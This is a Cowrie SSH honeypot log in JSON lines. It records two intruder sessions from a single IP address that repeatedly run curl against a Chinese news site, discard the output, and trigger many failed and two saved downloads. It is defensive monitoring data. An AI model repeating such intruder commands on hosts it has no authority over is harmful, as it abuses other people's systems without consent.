{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.346734Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.348442Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.350913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.351938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.380046Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.381148Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.391816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.392789Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.398087Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.399474Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.419743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.420905Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.433978Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.435116Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.442847Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.444336Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.463294Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.464496Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.482068Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.483252Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.487195Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.488850Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.509388Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.510530Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.525961Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.527190Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.546285Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.547283Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.635384Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.637734Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.640025Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.643097Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.646632Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.648100Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.652610Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.653895Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.677022Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.679950Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.700762Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.701979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.704781Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.705746Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.711356Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.730529Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.744630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.746089Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.750552Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.751531Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.752957Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.775006Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.801789Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.803112Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.806439Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.816169Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.817559Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.822653Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.845170Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.853681Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.855007Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.861811Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.863277Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.868175Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.903869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.905223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.908164Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.909085Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.911813Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.951400Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.952657Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:25.955672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.956457Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:25.957357Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.002603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.003977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.006456Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.007360Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.023957Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.047153Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.048253Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.050341Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.051555Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.059684Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.090610Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.091723Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.093704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.094814Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.096093Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.171956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.175360Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.177754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.178837Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.181051Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.182044Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.207476Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.218213Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.219379Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.225367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.226467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.229786Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.257925Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.259335Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.261795Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.262995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.271296Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.272328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.301344Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.302428Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.310788Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.311797Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.313949Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.334028Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.336937Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.337972Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.351667Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.377545Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.379803Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.424115Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.425544Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.473115Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.498201Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.499426Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.521590Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.523307Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.526926Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.528179Z","src_ip":"212.227.125.160","session":"7541ed730449"}
